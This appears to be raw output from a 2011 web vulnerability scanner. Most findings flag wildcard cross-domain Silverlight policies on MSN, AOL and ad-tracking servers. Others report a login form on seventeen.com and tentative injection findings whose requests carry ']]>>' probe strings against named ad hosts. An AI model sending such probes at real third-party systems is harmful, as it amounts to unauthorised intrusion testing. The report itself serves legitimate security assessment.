GET /clientaccesspolicy.xml HTTP/1.0 Host: c.msn.com |
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT Accept-Ranges: bytes ETag: "044698a197dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 17 Sep 2011 16:29:03 GMT Connection: keep-alive Content-Length: 340 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <g ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.eyewonder.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: cdn.eyewonder.com |
HTTP/1.0 200 OK Cache-Control: max-age=3600 Content-Type: text/xml Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT Accept-Ranges: bytes ETag: "a683d7574fd1ca1:1841" Server: Microsoft-IIS/6.0 p3p: policyref="/100125/w3c X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:38:50 GMT Content-Length: 268 Connection: close <?xml version="1.0" encoding="utf-8"?><access ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dc.kaboodle.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: dc.kaboodle.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:31:59 GMT Server: Omniture DC/2.0.0 xserver: www357 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://edge1.catalog |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: edge1.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "bd4e6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 433 Age: 759012 Date: Sat, 17 Sep 2011 16:30:01 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Thu, 22 Sep 2011 21:39:49 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> ...[SNIP]... <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://edge3.catalog |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: edge3.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "bd4e6a41d40cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 433 Age: 763820 Date: Sat, 17 Sep 2011 16:30:22 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Thu, 22 Sep 2011 20:20:02 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> ...[SNIP]... <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hearst.112.2o7.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: hearst.112.2o7.net |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:06 GMT Server: Omniture DC/2.0.0 xserver: www391 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hearstmagazines |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: hearstmagazines.112.2o7 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:21:17 GMT Server: Omniture DC/2.0.0 xserver: www416 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.widgets.video |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: img.widgets.video.s-msn |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Type: text/xml Last-Modified: Fri, 15 Jul 2011 09:32:07 GMT Accept-Ranges: bytes ETag: "9bc59c10d242cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:28:02 GMT Content-Length: 348 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> </allow-from> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img1.catalog.video |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: img1.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "bd4e6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 433 Age: 144 Date: Sat, 17 Sep 2011 16:32:42 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Sat, 01 Oct 2011 16:30:18 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> ...[SNIP]... <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img2.catalog.video |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: img2.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Accept-Ranges: bytes ETag: "bd4e6a41d40cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:34:42 GMT Content-Length: 433 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> ...[SNIP]... <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img3.catalog.video |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: img3.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Accept-Ranges: bytes ETag: "bd4e6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:30:18 GMT Content-Length: 433 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> ...[SNIP]... <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img4.catalog.video |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: img4.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Accept-Ranges: bytes ETag: "bd4e6a41d40cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:32:16 GMT Content-Length: 433 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> ...[SNIP]... <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.elle.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.elle.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:38:13 GMT Server: Omniture DC/2.0.0 xserver: www637 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.seattlepi |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.seattlepi.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:36 GMT Server: Omniture DC/2.0.0 xserver: www7 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: o.aolcdn.com |
HTTP/1.0 200 OK Server: Apache ETag: "d8baf0f1b81f70a7f23 Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT Content-Type: application/xml Cache-Control: max-age=1209600 Expires: Sat, 01 Oct 2011 17:35:32 GMT Date: Sat, 17 Sep 2011 17:35:32 GMT Content-Length: 338 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://o.sa.aol.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: o.sa.aol.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:37:16 GMT Server: Omniture DC/2.0.0 xserver: www334 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://omnituretrack |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: omnituretrack.local.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:28:49 GMT Server: Omniture DC/2.0.0 xserver: www400 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Sun, 18 Sep 2011 16:23:09 GMT Content-Type: text/xml Content-Length: 312 Date: Sat, 17 Sep 2011 16:23:09 GMT Server: QS <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> <resour ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rad.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT Accept-Ranges: bytes ETag: "0c969ab9748cc1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Sat, 17 Sep 2011 16:27:57 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 17 Sep 2011 02:43:44 GMT Expires: Sat, 17 Sep 2011 02:43:14 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 49784 Cache-Control: public, max-age=86400 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 16:23:07 GMT Content-Type: text/xml Content-Length: 255 Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT Connection: close Expires: Sat, 24 Sep 2011 16:23:07 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shadow01 |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: shadow01.yumenetworks.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:46:33 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2 Last-Modified: Fri, 18 Mar 2011 20:57:11 GMT ETag: "12ab3f0-135-49ec805 Accept-Ranges: bytes Content-Length: 309 P3P: policyref="http://qa-web Access-Control-Allow Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> </allow-from> <grant-to> <resourc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://spe.atdmt.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: spe.atdmt.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Expires: Sat, 24 Sep 2011 09:05:06 GMT Date: Sat, 17 Sep 2011 16:39:32 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://video.od |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: video.od.visiblemeasures |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 16:30:16 GMT Content-Type: text/xml Content-Length: 326 Last-Modified: Wed, 09 Mar 2011 01:34:36 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <r ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://vms.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: vms.msn.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 28 Aug 2009 08:31:44 GMT Accept-Ranges: bytes ETag: "01864f9b927ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:30:26 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://y.timesunion.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: y.timesunion.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:22 GMT Server: Omniture DC/2.0.0 xserver: www653 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://ts3.mm.bing.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ts3.mm.bing.net |
HTTP/1.0 200 OK Content-Length: 1766 Content-Type: text/xml Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT Date: Sat, 17 Sep 2011 16:29:48 GMT Connection: close Cache-Control: public, max-age=3600 <?xml version="1.0" encoding="utf-8"?> <!-- FD --> <access-policy> <cross-domain-access> <policy> </policy> <policy> <allow-from http-request-headers="*" ...[SNIP]... <domain uri="http://*.msn.com" /> ...[SNIP]... <domain uri="http://*.microsoft.com" /> ...[SNIP]... <domain uri="http://*.bing4.com" /> ...[SNIP]... <domain uri="http://*.virtualearth.net" /> ...[SNIP]... <domain uri="http://*.virtualearth-int ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://choice.atdmt.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: choice.atdmt.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT Accept-Ranges: bytes ETag: "06c2d547f56cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:47:03 GMT Connection: close Content-Length: 416 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="http://choice.live.com"/> <domain uri="https://choice.live.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://choice.bing.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: choice.bing.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT Accept-Ranges: bytes ETag: "06c2d547f56cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:47:00 GMT Connection: close Content-Length: 416 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="http://choice.live.com"/> <domain uri="https://choice.live.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://choice.microsoft |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: choice.microsoft.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT Accept-Ranges: bytes ETag: "06c2d547f56cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:47:14 GMT Connection: close Content-Length: 416 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="http://choice.live.com"/> <domain uri="https://choice.live.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://choice.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: choice.msn.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT Accept-Ranges: bytes ETag: "06c2d547f56cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:46:36 GMT Connection: close Content-Length: 416 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="http://choice.live.com"/> <domain uri="https://choice.live.com"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.seventeen.com |
Path: | / |
GET / HTTP/1.1 Host: www.seventeen.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Vary: Accept-Encoding Cache-Control: max-age=68 Date: Sat, 17 Sep 2011 16:34:01 GMT Content-Length: 103172 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form name="login" id="amin" onsubmit="$h.FB.modal <b> ...[SNIP]... </div> <input name="password" id="password" type="password" class="password" /> <div id="button" class="right"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://adunit.cdn |
Path: | /flash/modules/display |
GET /flash]]>>/modules/display Host: adunit.cdn.auditude.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Cache-Control: max-age=604800 Content-Type: text/html Date: Sat, 17 Sep 2011 16:28:00 GMT Expires: Sat, 24 Sep 2011 16:28:00 GMT Server: EOS (lax002/2898) Content-Length: 345 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://adunit.cdn |
Path: | /flash/modules/display |
GET /flash/modules]]>>/display/auditudeDis Host: adunit.cdn.auditude.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Cache-Control: max-age=604800 Content-Type: text/html Date: Sat, 17 Sep 2011 16:28:07 GMT Expires: Sat, 24 Sep 2011 16:28:07 GMT Server: EOS (lax002/54FE) Content-Length: 345 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://adunit.cdn |
Path: | /flash/modules/display |
GET /flash/modules/display]]>>/auditudeDisplayLib.js Host: adunit.cdn.auditude.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Cache-Control: max-age=0 Cache-Control: must-revalidate Content-Type: text/html Date: Sat, 17 Sep 2011 16:28:14 GMT Expires: Sat, 17 Sep 2011 16:28:14 GMT Server: EOS (lax002/2868) Content-Length: 345 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://adunit.cdn |
Path: | /flash/modules/display |
GET /flash/modules/display Host: adunit.cdn.auditude.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Cache-Control: max-age=0 Cache-Control: must-revalidate Content-Type: text/html Date: Sat, 17 Sep 2011 16:28:22 GMT Expires: Sat, 17 Sep 2011 16:28:22 GMT Server: EOS (lax002/54FE) Content-Length: 345 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adsc/d926534/6/43407814 |
GET /adsc]]>>/d926534/6/43407814 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:41:48 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1200 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adsc/d927907/35/43624044 |
GET /adsc]]>>/d927907/35/43624044 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.answerology Cookie: ES=917157-$MM\M-0_845473 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:33:45 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1308 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen]]>>/d_layer.php?sub=amch Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:39:05 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php]]>>?sub=amch&type=d_layer Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:39:05 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1198 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen]]>>/dynamiclink.js.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
